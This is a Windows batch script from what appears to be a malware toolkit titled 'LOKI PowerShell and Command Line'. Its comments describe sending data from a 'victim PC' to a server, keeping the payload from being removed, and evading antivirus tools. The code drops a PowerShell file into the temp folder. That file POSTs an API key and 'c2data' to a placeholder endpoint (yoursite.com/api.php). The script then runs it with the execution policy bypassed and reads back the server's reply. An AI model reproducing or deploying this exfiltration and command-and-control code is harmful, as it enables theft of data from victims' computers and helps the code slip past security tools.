REM ----------------------------------------------------------------------------------------------------
REM Author: MAZZONI ROBERTO
REM Payload Snippet: SEND API/POST , SEND DATA FROM VICTIM PC TO SERVER AND GET/ANALYZE RESULT OUTPUT
REM Title : LOKI PowerShell and Command Line
REM ---------------------------------------------------------------------------------------------------
REM AUTOGENERATE POWERSHELL CODE - ANTIREMOVE
REM OUTPUT PS1 FILE: temp\STS.ps1 , rename it....
REM FROM AV EVASION ADD RANDOM PROGRAM LINE

REM Start Snippet...
set sendPS=%TMP%\STS.ps1
echo $apikey=$args[0]>%sendPS%
echo $c=$args[1]>>%sendPS%
echo $z=$args[2]>>%sendPS%
echo $c2data=$args[3]>>%sendPS%
echo $URL="https://yoursite.com/api.php">>%sendPS%
echo $Body = @{>>%sendPS%
echo    "data_a" = $apikey;>>%sendPS%
echo    "data_b" = $c2data;>>%sendPS%
echo    "data_c" = $c;>>%sendPS%
echo    "data_d" = $z>>%sendPS%
echo	}>>%sendPS%
echo $response = Invoke-RestMethod -Uri $URL -Body $Body -Method POST>>%sendPS%
REM ---------------------------------------------------------------------------------------------------
echo echo $response>>%sendPS%
REM ---------------------------------------------------------------------------------------------------
REM End Snippet...


set powerPolicy=-ExecutionPolicy Bypass
for /f "delims=" %%a in ('PowerShell.exe %powerPolicy% -File %TMP%\STS.ps1 %arg0% %arg1% %arg2% %arg3%') do SET output=%%a

